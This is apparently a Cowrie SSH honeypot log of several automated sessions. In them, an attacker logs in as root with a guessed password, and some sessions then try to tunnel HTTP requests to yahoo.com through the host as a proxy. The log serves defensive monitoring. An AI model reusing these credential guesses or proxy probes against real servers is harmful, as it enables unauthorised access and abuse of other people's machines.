{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61926,"dst_ip":"1.2.3.4","dst_port":22,"session":"f724dbca72c6","protocol":"ssh","message":"New connection: 213.209.150.239:61926 (1.2.3.4:22) [session: f724dbca72c6]","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.249445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.250204Z","src_ip":"213.209.150.239","session":"f724dbca72c6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.307012Z","src_ip":"213.209.150.239","session":"f724dbca72c6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.589619Z","src_ip":"213.209.150.239","session":"f724dbca72c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28121,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28121","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.647882Z","session":"f724dbca72c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.704718Z","src_ip":"213.209.150.239","session":"f724dbca72c6"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":56772,"dst_ip":"1.2.3.4","dst_port":22,"session":"05ce1a04d93f","protocol":"ssh","message":"New connection: 36.89.28.139:56772 (1.2.3.4:22) [session: 05ce1a04d93f]","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.798320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.799273Z","src_ip":"36.89.28.139","session":"05ce1a04d93f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28076,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28076","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.858927Z","session":"f724dbca72c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.915722Z","src_ip":"213.209.150.239","session":"f724dbca72c6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.973761Z","src_ip":"213.209.150.239","session":"f724dbca72c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.995178Z","src_ip":"36.89.28.139","session":"05ce1a04d93f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61976,"dst_ip":"1.2.3.4","dst_port":22,"session":"c420b8ddd2d3","protocol":"ssh","message":"New connection: 213.209.150.239:61976 (1.2.3.4:22) [session: c420b8ddd2d3]","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.029514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.030334Z","src_ip":"213.209.150.239","session":"c420b8ddd2d3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.087045Z","src_ip":"213.209.150.239","session":"c420b8ddd2d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.369584Z","src_ip":"213.209.150.239","session":"c420b8ddd2d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23108,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23108","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.427365Z","session":"c420b8ddd2d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.484094Z","src_ip":"213.209.150.239","session":"c420b8ddd2d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2019,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2019","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.639140Z","session":"c420b8ddd2d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.696088Z","src_ip":"213.209.150.239","session":"c420b8ddd2d3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.753577Z","src_ip":"213.209.150.239","session":"c420b8ddd2d3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62027,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e1455950354","protocol":"ssh","message":"New connection: 213.209.150.239:62027 (1.2.3.4:22) [session: 8e1455950354]","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.799464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.800458Z","src_ip":"213.209.150.239","session":"8e1455950354"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.822380Z","src_ip":"36.89.28.139","session":"05ce1a04d93f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:51.847458Z","src_ip":"213.209.150.239","session":"8e1455950354"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.082465Z","src_ip":"213.209.150.239","session":"8e1455950354"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16699,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16699","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.130556Z","session":"8e1455950354"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.177792Z","src_ip":"213.209.150.239","session":"8e1455950354"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":16045,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16045","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.313332Z","session":"8e1455950354"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.360428Z","src_ip":"213.209.150.239","session":"8e1455950354"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.408520Z","src_ip":"213.209.150.239","session":"8e1455950354"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62061,"dst_ip":"1.2.3.4","dst_port":22,"session":"68488324d408","protocol":"ssh","message":"New connection: 213.209.150.239:62061 (1.2.3.4:22) [session: 68488324d408]","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.455103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.456107Z","src_ip":"213.209.150.239","session":"68488324d408"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.503637Z","src_ip":"213.209.150.239","session":"68488324d408"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.738938Z","src_ip":"213.209.150.239","session":"68488324d408"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":29778,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29778","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.787172Z","session":"68488324d408"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.834509Z","src_ip":"213.209.150.239","session":"68488324d408"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":21855,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21855","sensor":"my-vps","timestamp":"2025-08-26T00:57:52.969522Z","session":"68488324d408"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.016893Z","src_ip":"213.209.150.239","session":"68488324d408"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.019809Z","src_ip":"36.89.28.139","session":"05ce1a04d93f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.065071Z","src_ip":"213.209.150.239","session":"68488324d408"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62099,"dst_ip":"1.2.3.4","dst_port":22,"session":"25b975068de3","protocol":"ssh","message":"New connection: 213.209.150.239:62099 (1.2.3.4:22) [session: 25b975068de3]","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.111097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.111837Z","src_ip":"213.209.150.239","session":"25b975068de3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.158978Z","src_ip":"213.209.150.239","session":"25b975068de3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.393563Z","src_ip":"213.209.150.239","session":"25b975068de3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24493,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24493","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.441803Z","session":"25b975068de3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.489359Z","src_ip":"213.209.150.239","session":"25b975068de3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6242,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6242","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.625458Z","session":"25b975068de3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.672525Z","src_ip":"213.209.150.239","session":"25b975068de3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:53.720497Z","src_ip":"213.209.150.239","session":"25b975068de3"}
